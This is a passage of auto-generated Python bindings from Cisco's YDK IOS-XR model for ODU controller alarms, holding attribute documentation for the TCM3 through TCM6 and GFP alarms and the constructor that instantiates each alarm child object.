**type**\: :py:class:`Tcm2SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2SdBer>`
**config**\: False
.. attribute:: tcm3_ais
TCM3 Alarm Indication Signal
**type**\: :py:class:`Tcm3Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Ais>`
**config**\: False
.. attribute:: tcm3_ltc
TCM3 Loss of Tandem connection Monitoring
**type**\: :py:class:`Tcm3Ltc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Ltc>`
**config**\: False
.. attribute:: tcm3_oci
TCM3 Open Connection Indiction
**type**\: :py:class:`Tcm3Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Oci>`
**config**\: False
.. attribute:: tcm3_lck
TCM3 Upstream Connection Locked
**type**\: :py:class:`Tcm3Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Lck>`
**config**\: False
.. attribute:: tcm3_iae
TCM3 Incoming Alignment Error
**type**\: :py:class:`Tcm3Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Iae>`
**config**\: False
.. attribute:: tcm3_biae
TCM3 Backward Incoming Alignment Error
**type**\: :py:class:`Tcm3Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Biae>`
**config**\: False
.. attribute:: tcm3_bdi
TCM3 Backward Defect Monitoring
**type**\: :py:class:`Tcm3Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Bdi>`
**config**\: False
.. attribute:: tcm3_tim
TCM3 Trail Trace Identifier Mismatch
**type**\: :py:class:`Tcm3Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Tim>`
**config**\: False
.. attribute:: tcm3_sf_ber
TCM3 SF BER alarm
**type**\: :py:class:`Tcm3SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3SfBer>`
**config**\: False
.. attribute:: tcm3_sd_ber
TCM3 SD BER alarm
**type**\: :py:class:`Tcm3SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3SdBer>`
**config**\: False
.. attribute:: tcm4_ais
TCM4 Alarm Indication Signal
**type**\: :py:class:`Tcm4Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Ais>`
**config**\: False
.. attribute:: tcm4_ltc
TCM4 Loss of Tandem connection Monitoring
**type**\: :py:class:`Tcm4Ltc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Ltc>`
**config**\: False
.. attribute:: tcm4_oci
TCM4 Open Connection Indiction
**type**\: :py:class:`Tcm4Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Oci>`
**config**\: False
.. attribute:: tcm4_lck
TCM4 Upstream Connection Locked
**type**\: :py:class:`Tcm4Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Lck>`
**config**\: False
.. attribute:: tcm4_iae
TCM4 Incoming Alignment Error
**type**\: :py:class:`Tcm4Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Iae>`
**config**\: False
.. attribute:: tcm4_biae
TCM4 Backward Incoming Alignment Error
**type**\: :py:class:`Tcm4Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Biae>`
**config**\: False
.. attribute:: tcm4_bdi
TCM4 Backward Defect Monitoring
**type**\: :py:class:`Tcm4Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Bdi>`
**config**\: False
.. attribute:: tcm4_tim
TCM4 Trail Trace Identifier Mismatch
**type**\: :py:class:`Tcm4Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Tim>`
**config**\: False
.. attribute:: tcm4_sf_ber
TCM4 SF BER alarm
**type**\: :py:class:`Tcm4SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4SfBer>`
**config**\: False
.. attribute:: tcm4_sd_ber
TCM4 SD BER alarm
**type**\: :py:class:`Tcm4SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4SdBer>`
**config**\: False
.. attribute:: tcm5_ais
TCM5 Alarm Indication Signal
**type**\: :py:class:`Tcm5Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Ais>`
**config**\: False
.. attribute:: tcm5_ltc
TCM5 Loss of Tandem connection Monitoring
**type**\: :py:class:`Tcm5Ltc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Ltc>`
**config**\: False
.. attribute:: tcm5_oci
TCM5 Open Connection Indiction
**type**\: :py:class:`Tcm5Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Oci>`
**config**\: False
.. attribute:: tcm5_lck
TCM5 Upstream Connection Locked
**type**\: :py:class:`Tcm5Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Lck>`
**config**\: False
.. attribute:: tcm5_iae
TCM5 Incoming Alignment Error
**type**\: :py:class:`Tcm5Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Iae>`
**config**\: False
.. attribute:: tcm5_biae
TCM5 Backward Incoming Alignment Error
**type**\: :py:class:`Tcm5Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Biae>`
**config**\: False
.. attribute:: tcm5_bdi
TCM5 Backward Defect Monitoring
**type**\: :py:class:`Tcm5Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Bdi>`
**config**\: False
.. attribute:: tcm5_tim
TCM5 Trail Trace Identifier Mismatch
**type**\: :py:class:`Tcm5Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Tim>`
**config**\: False
.. attribute:: tcm5_sf_ber
TCM5 SF BER alarm
**type**\: :py:class:`Tcm5SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5SfBer>`
**config**\: False
.. attribute:: tcm5_sd_ber
TCM5 SD BER alarm
**type**\: :py:class:`Tcm5SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5SdBer>`
**config**\: False
.. attribute:: tcm6_ais
TCM6 Alarm Indication Signal
**type**\: :py:class:`Tcm6Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Ais>`
**config**\: False
.. attribute:: tcm6_ltc
TCM6 Loss of Tandem connection Monitoring
**type**\: :py:class:`Tcm6Ltc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Ltc>`
**config**\: False
.. attribute:: tcm6_oci
TCM6 Open Connection Indiction
**type**\: :py:class:`Tcm6Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Oci>`
**config**\: False
.. attribute:: tcm6_lck
TCM6 Upstream Connection Locked
**type**\: :py:class:`Tcm6Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Lck>`
**config**\: False
.. attribute:: tcm6_iae
TCM6 Incoming Alignment Error
**type**\: :py:class:`Tcm6Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Iae>`
**config**\: False
.. attribute:: tcm6_biae
TCM6 Backward Incoming Alignment Error
**type**\: :py:class:`Tcm6Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Biae>`
**config**\: False
.. attribute:: tcm6_bdi
TCM6 Backward Defect Monitoring
**type**\: :py:class:`Tcm6Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Bdi>`
**config**\: False
.. attribute:: tcm6_tim
TCM6 Trail Trace Identifier Mismatch
**type**\: :py:class:`Tcm6Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Tim>`
**config**\: False
.. attribute:: tcm6_sf_ber
TCM6 SF BER alarm
**type**\: :py:class:`Tcm6SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6SfBer>`
**config**\: False
.. attribute:: tcm6_sd_ber
TCM6 SD BER alarm
**type**\: :py:class:`Tcm6SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6SdBer>`
**config**\: False
.. attribute:: gfp_lfd
Loss Of Frame Delineation
**type**\: :py:class:`GfpLfd <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.GfpLfd>`
**config**\: False
.. attribute:: gfp_locs
Loss Of Client Signal
**type**\: :py:class:`GfpLocs <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.GfpLocs>`
**config**\: False
.. attribute:: gfp_loccs
Loss Of Character Synchronization
**type**\: :py:class:`GfpLoccs <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.GfpLoccs>`
**config**\: False
.. attribute:: gfp_upm
User Payload Mismatch
**type**\: :py:class:`GfpUpm <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.GfpUpm>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm, self).__init__()
self.yang_name = "alarm"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("oci", ("oci", Odu.Controllers.Controller.Info.Alarm.Oci)), ("ais", ("ais", Odu.Controllers.Controller.Info.Alarm.Ais)), ("lck", ("lck", Odu.Controllers.Controller.Info.Alarm.Lck)), ("bdi", ("bdi", Odu.Controllers.Controller.Info.Alarm.Bdi)), ("eoc", ("eoc", Odu.Controllers.Controller.Info.Alarm.Eoc)), ("ptim", ("ptim", Odu.Controllers.Controller.Info.Alarm.Ptim)), ("tim", ("tim", Odu.Controllers.Controller.Info.Alarm.Tim)), ("iae", ("iae", Odu.Controllers.Controller.Info.Alarm.Iae)), ("biae", ("biae", Odu.Controllers.Controller.Info.Alarm.Biae)), ("sf-ber", ("sf_ber", Odu.Controllers.Controller.Info.Alarm.SfBer)), ("sd-ber", ("sd_ber", Odu.Controllers.Controller.Info.Alarm.SdBer)), ("csf", ("csf", Odu.Controllers.Controller.Info.Alarm.Csf)), ("tcm1-ais", ("tcm1_ais", Odu.Controllers.Controller.Info.Alarm.Tcm1Ais)), ("tcm1-ltc", ("tcm1_ltc", Odu.Controllers.Controller.Info.Alarm.Tcm1Ltc)), ("tcm1-oci", ("tcm1_oci", Odu.Controllers.Controller.Info.Alarm.Tcm1Oci)), ("tcm1-lck", ("tcm1_lck", Odu.Controllers.Controller.Info.Alarm.Tcm1Lck)), ("tcm1-iae", ("tcm1_iae", Odu.Controllers.Controller.Info.Alarm.Tcm1Iae)), ("tcm1-biae", ("tcm1_biae", Odu.Controllers.Controller.Info.Alarm.Tcm1Biae)), ("tcm1-bdi", ("tcm1_bdi", Odu.Controllers.Controller.Info.Alarm.Tcm1Bdi)), ("tcm1-tim", ("tcm1_tim", Odu.Controllers.Controller.Info.Alarm.Tcm1Tim)), ("tcm1-sf-ber", ("tcm1_sf_ber", Odu.Controllers.Controller.Info.Alarm.Tcm1SfBer)), ("tcm1-sd-ber", ("tcm1_sd_ber", Odu.Controllers.Controller.Info.Alarm.Tcm1SdBer)), ("tcm2-ais", ("tcm2_ais", Odu.Controllers.Controller.Info.Alarm.Tcm2Ais)), ("tcm2-ltc", ("tcm2_ltc", Odu.Controllers.Controller.Info.Alarm.Tcm2Ltc)), ("tcm2-oci", ("tcm2_oci", Odu.Controllers.Controller.Info.Alarm.Tcm2Oci)), ("tcm2-lck", ("tcm2_lck", Odu.Controllers.Controller.Info.Alarm.Tcm2Lck)), ("tcm2-iae", ("tcm2_iae", Odu.Controllers.Controller.Info.Alarm.Tcm2Iae)), ("tcm2-biae", ("tcm2_biae", 
Odu.Controllers.Controller.Info.Alarm.Tcm2Biae)), ("tcm2-bdi", ("tcm2_bdi", Odu.Controllers.Controller.Info.Alarm.Tcm2Bdi)), ("tcm2-tim", ("tcm2_tim", Odu.Controllers.Controller.Info.Alarm.Tcm2Tim)), ("tcm2-sf-ber", ("tcm2_sf_ber", Odu.Controllers.Controller.Info.Alarm.Tcm2SfBer)), ("tcm2-sd-ber", ("tcm2_sd_ber", Odu.Controllers.Controller.Info.Alarm.Tcm2SdBer)), ("tcm3-ais", ("tcm3_ais", Odu.Controllers.Controller.Info.Alarm.Tcm3Ais)), ("tcm3-ltc", ("tcm3_ltc", Odu.Controllers.Controller.Info.Alarm.Tcm3Ltc)), ("tcm3-oci", ("tcm3_oci", Odu.Controllers.Controller.Info.Alarm.Tcm3Oci)), ("tcm3-lck", ("tcm3_lck", Odu.Controllers.Controller.Info.Alarm.Tcm3Lck)), ("tcm3-iae", ("tcm3_iae", Odu.Controllers.Controller.Info.Alarm.Tcm3Iae)), ("tcm3-biae", ("tcm3_biae", Odu.Controllers.Controller.Info.Alarm.Tcm3Biae)), ("tcm3-bdi", ("tcm3_bdi", Odu.Controllers.Controller.Info.Alarm.Tcm3Bdi)), ("tcm3-tim", ("tcm3_tim", Odu.Controllers.Controller.Info.Alarm.Tcm3Tim)), ("tcm3-sf-ber", ("tcm3_sf_ber", Odu.Controllers.Controller.Info.Alarm.Tcm3SfBer)), ("tcm3-sd-ber", ("tcm3_sd_ber", Odu.Controllers.Controller.Info.Alarm.Tcm3SdBer)), ("tcm4-ais", ("tcm4_ais", Odu.Controllers.Controller.Info.Alarm.Tcm4Ais)), ("tcm4-ltc", ("tcm4_ltc", Odu.Controllers.Controller.Info.Alarm.Tcm4Ltc)), ("tcm4-oci", ("tcm4_oci", Odu.Controllers.Controller.Info.Alarm.Tcm4Oci)), ("tcm4-lck", ("tcm4_lck", Odu.Controllers.Controller.Info.Alarm.Tcm4Lck)), ("tcm4-iae", ("tcm4_iae", Odu.Controllers.Controller.Info.Alarm.Tcm4Iae)), ("tcm4-biae", ("tcm4_biae", Odu.Controllers.Controller.Info.Alarm.Tcm4Biae)), ("tcm4-bdi", ("tcm4_bdi", Odu.Controllers.Controller.Info.Alarm.Tcm4Bdi)), ("tcm4-tim", ("tcm4_tim", Odu.Controllers.Controller.Info.Alarm.Tcm4Tim)), ("tcm4-sf-ber", ("tcm4_sf_ber", Odu.Controllers.Controller.Info.Alarm.Tcm4SfBer)), ("tcm4-sd-ber", ("tcm4_sd_ber", Odu.Controllers.Controller.Info.Alarm.Tcm4SdBer)), ("tcm5-ais", ("tcm5_ais", Odu.Controllers.Controller.Info.Alarm.Tcm5Ais)), ("tcm5-ltc", 
("tcm5_ltc", Odu.Controllers.Controller.Info.Alarm.Tcm5Ltc)), ("tcm5-oci", ("tcm5_oci", Odu.Controllers.Controller.Info.Alarm.Tcm5Oci)), ("tcm5-lck", ("tcm5_lck", Odu.Controllers.Controller.Info.Alarm.Tcm5Lck)), ("tcm5-iae", ("tcm5_iae", Odu.Controllers.Controller.Info.Alarm.Tcm5Iae)), ("tcm5-biae", ("tcm5_biae", Odu.Controllers.Controller.Info.Alarm.Tcm5Biae)), ("tcm5-bdi", ("tcm5_bdi", Odu.Controllers.Controller.Info.Alarm.Tcm5Bdi)), ("tcm5-tim", ("tcm5_tim", Odu.Controllers.Controller.Info.Alarm.Tcm5Tim)), ("tcm5-sf-ber", ("tcm5_sf_ber", Odu.Controllers.Controller.Info.Alarm.Tcm5SfBer)), ("tcm5-sd-ber", ("tcm5_sd_ber", Odu.Controllers.Controller.Info.Alarm.Tcm5SdBer)), ("tcm6-ais", ("tcm6_ais", Odu.Controllers.Controller.Info.Alarm.Tcm6Ais)), ("tcm6-ltc", ("tcm6_ltc", Odu.Controllers.Controller.Info.Alarm.Tcm6Ltc)), ("tcm6-oci", ("tcm6_oci", Odu.Controllers.Controller.Info.Alarm.Tcm6Oci)), ("tcm6-lck", ("tcm6_lck", Odu.Controllers.Controller.Info.Alarm.Tcm6Lck)), ("tcm6-iae", ("tcm6_iae", Odu.Controllers.Controller.Info.Alarm.Tcm6Iae)), ("tcm6-biae", ("tcm6_biae", Odu.Controllers.Controller.Info.Alarm.Tcm6Biae)), ("tcm6-bdi", ("tcm6_bdi", Odu.Controllers.Controller.Info.Alarm.Tcm6Bdi)), ("tcm6-tim", ("tcm6_tim", Odu.Controllers.Controller.Info.Alarm.Tcm6Tim)), ("tcm6-sf-ber", ("tcm6_sf_ber", Odu.Controllers.Controller.Info.Alarm.Tcm6SfBer)), ("tcm6-sd-ber", ("tcm6_sd_ber", Odu.Controllers.Controller.Info.Alarm.Tcm6SdBer)), ("gfp-lfd", ("gfp_lfd", Odu.Controllers.Controller.Info.Alarm.GfpLfd)), ("gfp-locs", ("gfp_locs", Odu.Controllers.Controller.Info.Alarm.GfpLocs)), ("gfp-loccs", ("gfp_loccs", Odu.Controllers.Controller.Info.Alarm.GfpLoccs)), ("gfp-upm", ("gfp_upm", Odu.Controllers.Controller.Info.Alarm.GfpUpm))])
self._leafs = OrderedDict()
self.oci = Odu.Controllers.Controller.Info.Alarm.Oci()
self.oci.parent = self
self._children_name_map["oci"] = "oci"
self.ais = Odu.Controllers.Controller.Info.Alarm.Ais()
self.ais.parent = self
self._children_name_map["ais"] = "ais"
self.lck = Odu.Controllers.Controller.Info.Alarm.Lck()
self.lck.parent = self
self._children_name_map["lck"] = "lck"
self.bdi = Odu.Controllers.Controller.Info.Alarm.Bdi()
self.bdi.parent = self
self._children_name_map["bdi"] = "bdi"
self.eoc = Odu.Controllers.Controller.Info.Alarm.Eoc()
self.eoc.parent = self
self._children_name_map["eoc"] = "eoc"
self.ptim = Odu.Controllers.Controller.Info.Alarm.Ptim()
self.ptim.parent = self
self._children_name_map["ptim"] = "ptim"
self.tim = Odu.Controllers.Controller.Info.Alarm.Tim()
self.tim.parent = self
self._children_name_map["tim"] = "tim"
self.iae = Odu.Controllers.Controller.Info.Alarm.Iae()
self.iae.parent = self
self._children_name_map["iae"] = "iae"
self.biae = Odu.Controllers.Controller.Info.Alarm.Biae()
self.biae.parent = self
self._children_name_map["biae"] = "biae"
self.sf_ber = Odu.Controllers.Controller.Info.Alarm.SfBer()
self.sf_ber.parent = self
self._children_name_map["sf_ber"] = "sf-ber"
self.sd_ber = Odu.Controllers.Controller.Info.Alarm.SdBer()
self.sd_ber.parent = self
self._children_name_map["sd_ber"] = "sd-ber"
self.csf = Odu.Controllers.Controller.Info.Alarm.Csf()
self.csf.parent = self
self._children_name_map["csf"] = "csf"
self.tcm1_ais = Odu.Controllers.Controller.Info.Alarm.Tcm1Ais()
self.tcm1_ais.parent = self
self._children_name_map["tcm1_ais"] = "tcm1-ais"
self.tcm1_ltc = Odu.Controllers.Controller.Info.Alarm.Tcm1Ltc()
self.tcm1_ltc.parent = self
self._children_name_map["tcm1_ltc"] = "tcm1-ltc"
self.tcm1_oci = Odu.Controllers.Controller.Info.Alarm.Tcm1Oci()
self.tcm1_oci.parent = self
self._children_name_map["tcm1_oci"] = "tcm1-oci"
self.tcm1_lck = Odu.Controllers.Controller.Info.Alarm.Tcm1Lck()
self.tcm1_lck.parent = self
self._children_name_map["tcm1_lck"] = "tcm1-lck"
self.tcm1_iae = Odu.Controllers.Controller.Info.Alarm.Tcm1Iae()
self.tcm1_iae.parent = self
self._children_name_map["tcm1_iae"] = "tcm1-iae"
self.tcm1_biae = Odu.Controllers.Controller.Info.Alarm.Tcm1Biae()
self.tcm1_biae.parent = self
self._children_name_map["tcm1_biae"] = "tcm1-biae"
self.tcm1_bdi = Odu.Controllers.Controller.Info.Alarm.Tcm1Bdi()
self.tcm1_bdi.parent = self
self._children_name_map["tcm1_bdi"] = "tcm1-bdi"
self.tcm1_tim = Odu.Controllers.Controller.Info.Alarm.Tcm1Tim()
self.tcm1_tim.parent = self
self._children_name_map["tcm1_tim"] = "tcm1-tim"
self.tcm1_sf_ber = Odu.Controllers.Controller.Info.Alarm.Tcm1SfBer()
self.tcm1_sf_ber.parent = self
self._children_name_map["tcm1_sf_ber"] = "tcm1-sf-ber"
self.tcm1_sd_ber = Odu.Controllers.Controller.Info.Alarm.Tcm1SdBer()
self.tcm1_sd_ber.parent = self
self._children_name_map["tcm1_sd_ber"] = "tcm1-sd-ber"
self.tcm2_ais = Odu.Controllers.Controller.Info.Alarm.Tcm2Ais()
self.tcm2_ais.parent = self
self._children_name_map["tcm2_ais"] = "tcm2-ais"
self.tcm2_ltc = Odu.Controllers.Controller.Info.Alarm.Tcm2Ltc()
self.tcm2_ltc.parent = self
self._children_name_map["tcm2_ltc"] = "tcm2-ltc"
self.tcm2_oci = Odu.Controllers.Controller.Info.Alarm.Tcm2Oci()
self.tcm2_oci.parent = self
self._children_name_map["tcm2_oci"] = "tcm2-oci"
self.tcm2_lck = Odu.Controllers.Controller.Info.Alarm.Tcm2Lck()
self.tcm2_lck.parent = self
self._children_name_map["tcm2_lck"] = "tcm2-lck"
self.tcm2_iae = Odu.Controllers.Controller.Info.Alarm.Tcm2Iae()
self.tcm2_iae.parent = self
self._children_name_map["tcm2_iae"] = "tcm2-iae"
self.tcm2_biae = Odu.Controllers.Controller.Info.Alarm.Tcm2Biae()
self.tcm2_biae.parent = self
self._children_name_map["tcm2_biae"] = "tcm2-biae"
self.tcm2_bdi = Odu.Controllers.Controller.Info.Alarm.Tcm2Bdi()
self.tcm2_bdi.parent = self
self._children_name_map["tcm2_bdi"] = "tcm2-bdi"
self.tcm2_tim = Odu.Controllers.Controller.Info.Alarm.Tcm2Tim()
self.tcm2_tim.parent = self
self._children_name_map["tcm2_tim"] = "tcm2-tim"
self.tcm2_sf_ber = Odu.Controllers.Controller.Info.Alarm.Tcm2SfBer()
self.tcm2_sf_ber.parent = self
self._children_name_map["tcm2_sf_ber"] = "tcm2-sf-ber"
self.tcm2_sd_ber = Odu.Controllers.Controller.Info.Alarm.Tcm2SdBer()
self.tcm2_sd_ber.parent = self
self._children_name_map["tcm2_sd_ber"] = "tcm2-sd-ber"
self.tcm3_ais = Odu.Controllers.Controller.Info.Alarm.Tcm3Ais()
self.tcm3_ais.parent = self
self._children_name_map["tcm3_ais"] = "tcm3-ais"
self.tcm3_ltc = Odu.Controllers.Controller.Info.Alarm.Tcm3Ltc()
self.tcm3_ltc.parent = self
self._children_name_map["tcm3_ltc"] = "tcm3-ltc"
self.tcm3_oci = Odu.Controllers.Controller.Info.Alarm.Tcm3Oci()
self.tcm3_oci.parent = self
self._children_name_map["tcm3_oci"] = "tcm3-oci"
self.tcm3_lck = Odu.Controllers.Controller.Info.Alarm.Tcm3Lck()
self.tcm3_lck.parent = self
self._children_name_map["tcm3_lck"] = "tcm3-lck"
self.tcm3_iae = Odu.Controllers.Controller.Info.Alarm.Tcm3Iae()
self.tcm3_iae.parent = self
self._children_name_map["tcm3_iae"] = "tcm3-iae"
self.tcm3_biae = Odu.Controllers.Controller.Info.Alarm.Tcm3Biae()
self.tcm3_biae.parent = self
self._children_name_map["tcm3_biae"] = "tcm3-biae"
self.tcm3_bdi = Odu.Controllers.Controller.Info.Alarm.Tcm3Bdi()
self.tcm3_bdi.parent = self
self._children_name_map["tcm3_bdi"] = "tcm3-bdi"
self.tcm3_tim = Odu.Controllers.Controller.Info.Alarm.Tcm3Tim()
self.tcm3_tim.parent = self
self._children_name_map["tcm3_tim"] = "tcm3-tim"
self.tcm3_sf_ber = Odu.Controllers.Controller.Info.Alarm.Tcm3SfBer()
self.tcm3_sf_ber.parent = self
self._children_name_map["tcm3_sf_ber"] = "tcm3-sf-ber"
self.tcm3_sd_ber = Odu.Controllers.Controller.Info.Alarm.Tcm3SdBer()
self.tcm3_sd_ber.parent = self
self._children_name_map["tcm3_sd_ber"] = "tcm3-sd-ber"
self.tcm4_ais = Odu.Controllers.Controller.Info.Alarm.Tcm4Ais()
self.tcm4_ais.parent = self
self._children_name_map["tcm4_ais"] = "tcm4-ais"
self.tcm4_ltc = Odu.Controllers.Controller.Info.Alarm.Tcm4Ltc()
self.tcm4_ltc.parent = self
self._children_name_map["tcm4_ltc"] = "tcm4-ltc"
self.tcm4_oci = Odu.Controllers.Controller.Info.Alarm.Tcm4Oci()
self.tcm4_oci.parent = self
self._children_name_map["tcm4_oci"] = "tcm4-oci"
self.tcm4_lck = Odu.Controllers.Controller.Info.Alarm.Tcm4Lck()
self.tcm4_lck.parent = self
self._children_name_map["tcm4_lck"] = "tcm4-lck"
self.tcm4_iae = Odu.Controllers.Controller.Info.Alarm.Tcm4Iae()
self.tcm4_iae.parent = self
self._children_name_map["tcm4_iae"] = "tcm4-iae"
self.tcm4_biae = Odu.Controllers.Controller.Info.Alarm.Tcm4Biae()
self.tcm4_biae.parent = self
self._children_name_map["tcm4_biae"] = "tcm4-biae"
self.tcm4_bdi = Odu.Controllers.Controller.Info.Alarm.Tcm4Bdi()
self.tcm4_bdi.parent = self
self._children_name_map["tcm4_bdi"] = "tcm4-bdi"
self.tcm4_tim = Odu.Controllers.Controller.Info.Alarm.Tcm4Tim()
self.tcm4_tim.parent = self
self._children_name_map["tcm4_tim"] = "tcm4-tim"
self.tcm4_sf_ber = Odu.Controllers.Controller.Info.Alarm.Tcm4SfBer()
self.tcm4_sf_ber.parent = self
self._children_name_map["tcm4_sf_ber"] = "tcm4-sf-ber"
self.tcm4_sd_ber = Odu.Controllers.Controller.Info.Alarm.Tcm4SdBer()
self.tcm4_sd_ber.parent = self
self._children_name_map["tcm4_sd_ber"] = "tcm4-sd-ber"
self.tcm5_ais = Odu.Controllers.Controller.Info.Alarm.Tcm5Ais()
self.tcm5_ais.parent = self
self._children_name_map["tcm5_ais"] = "tcm5-ais"
self.tcm5_ltc = Odu.Controllers.Controller.Info.Alarm.Tcm5Ltc()
self.tcm5_ltc.parent = self
self._children_name_map["tcm5_ltc"] = "tcm5-ltc"
self.tcm5_oci = Odu.Controllers.Controller.Info.Alarm.Tcm5Oci()
self.tcm5_oci.parent = self
self._children_name_map["tcm5_oci"] = "tcm5-oci"
self.tcm5_lck = Odu.Controllers.Controller.Info.Alarm.Tcm5Lck()
self.tcm5_lck.parent = self
self._children_name_map["tcm5_lck"] = "tcm5-lck"
self.tcm5_iae = Odu.Controllers.Controller.Info.Alarm.Tcm5Iae()
self.tcm5_iae.parent = self
self._children_name_map["tcm5_iae"] = "tcm5-iae"
self.tcm5_biae = Odu.Controllers.Controller.Info.Alarm.Tcm5Biae()
self.tcm5_biae.parent = self
self._children_name_map["tcm5_biae"] = "tcm5-biae"
self.tcm5_bdi = Odu.Controllers.Controller.Info.Alarm.Tcm5Bdi()
self.tcm5_bdi.parent = self
self._children_name_map["tcm5_bdi"] = "tcm5-bdi"
self.tcm5_tim = Odu.Controllers.Controller.Info.Alarm.Tcm5Tim()
self.tcm5_tim.parent = self
self._children_name_map["tcm5_tim"] = "tcm5-tim"
self.tcm5_sf_ber = Odu.Controllers.Controller.Info.Alarm.Tcm5SfBer()
self.tcm5_sf_ber.parent = self
self._children_name_map["tcm5_sf_ber"] = "tcm5-sf-ber"
self.tcm5_sd_ber = Odu.Controllers.Controller.Info.Alarm.Tcm5SdBer()
self.tcm5_sd_ber.parent = self
self._children_name_map["tcm5_sd_ber"] = "tcm5-sd-ber"
self.tcm6_ais = Odu.Controllers.Controller.Info.Alarm.Tcm6Ais()
self.tcm6_ais.parent = self
self._children_name_map["tcm6_ais"] = "tcm6-ais"
